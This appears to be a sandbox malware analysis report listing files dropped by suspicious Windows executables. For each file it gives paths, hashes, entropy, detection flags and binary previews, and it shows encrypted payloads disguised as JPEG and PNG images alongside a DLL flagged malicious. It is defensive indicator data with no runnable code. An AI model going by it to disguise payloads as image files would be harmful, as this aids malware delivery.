Entropy (8bit):	7.999955224887333
Encrypted:	true
SSDEEP:	98304:IOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:vo6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	5E22FD11155B744B4DFEFC4552FC9B76
SHA1:	D435D9E03A09F53328B76EC2EF75AB29B644A9B9
SHA-256:	B3E862E6047457F90F51FF138F91DE80297CA927A1CC963F0956C62618A8FC41
SHA-512:	34283CCEC3D3DB7DA9D61B8A29EA4A3FBC9C034F80EE26A153090994A8D296D3916220962315D72CAB8D439653E23678AB6415D4AA82A00B8909234473674BA3
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\vhZp0W\tbcore3U.dll

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516978109964
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/B:9S4+O6P5OeMRrjRy7aPZbm3k8V/B
MD5:	7D73D6E6F3393E802A8A033CD3E706F2
SHA1:	8F21547AFF3BBF8F911BA18547A47F93D8896397
SHA-256:	DC0D242ABD0919D6B73405E8BDB1C490E672FF787771E13DBA28A964778FD0A7
SHA-512:	44FB70FB5A5F47E572A2ADF21EAA32AC66D7EBB98C740AA163E85EE09884EB639074CF47DE1AC3319FBBFE5E55C073D9D48D6956D6B7EA0D123AD9873AFD3635
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\vhZp0W\utils.vcxproj

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399526322286
Encrypted:	true
SSDEEP:	6144:GiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:J8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	4447767BF6C2EE6123683567CAA3C291
SHA1:	FEBD378998E7215FA7053C817481B10149A8C3E8
SHA-256:	70AF3E1149816A223F43D57ADF3CEAD3D346D6C7EB4D3D79684FA11C4125D097
SHA-512:	F7B7A2ACC60A7951C5368B2AEEBB034D137AAC7C8148CBF87EAE9D74C6FB49D1916532D28485CB24E12655F11463EA74039859BCEED12C7C1F2A5AC00E912ACB
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Ka."q.2....#B...R..$3br........%&'()456789:CDEF8.217.47.169....."ijstuvwxyz....cvqthu.net......3#..............47.169....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\vhZp0W\vhZp0W.exe

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	MIPSEB MIPS-III ECOFF executable
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:s:s
MD5:	7E74F75663E5B5A4F3452A4C603EE45D
SHA1:	D5114B086B721F2C87EA7152025792958AB4C629
SHA-256:	DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
SHA-512:	2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.2008868627450004
Encrypted:	false
SSDEEP:	6:W7pdRda+CrCa2BIDR/yYWRudduXCCmZ7OdUzW9E40/qcX:mpUMBIDR/yYWRudduXCCmdgUzWg3
MD5:	6FE90B6ABE6C4D1079B730F10120B3D1
SHA1:	EEEC97FDCF98EEA2A53C033D5ECC75D5C3A0C438
SHA-256:	9EB8597171F3CDF8892B9DEC93A4E2D63DE7D2D9B28B823FB374E111583B55F5
SHA-512:	161CF27D69434B4049EA47B2E0AE9283B820DBF8659B3B5CDACCC7FF3CEEF1DBBB3DB7A58CD2AFE7617E3BE866C6E26CA14B30BF6464EBA4C75764715F700C2B
Malicious:	false
Preview:	....l%00ZI\X73v7DD.T:y61X[X_8q>3ZJF]>.s>QS._q86999999999999999999999999999999999QMMI:sff....ae a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33YJ_[40u4GG.W9z52[X[\;r=0YIE^=-p=RP.^p97888888888888888888888888888888888PLLH;rgg....`d!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6\|ylllllllllllllllllllllllllllllllllllll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-51[1].jpg

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-52[1].jpg

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5062442
Entropy (8bit):	7.999518892518095
Encrypted:	true
SSDEEP:	98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
MD5:	70C21DA900796B279A09040B00953E40
SHA1:	7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
SHA-256:	901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
SHA-512:	851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\lOXFJk.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	55085
Entropy (8bit):	7.99273647746538
Encrypted:	true
SSDEEP:	1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
MD5:	DC44AE348E6A74B3A74871020FDFAC74
SHA1:	B223020A5F82FF15FD5E4930477F38F34C9CB919
SHA-256:	48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
SHA-512:	5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~..a.....=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

Download File

Process:	C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
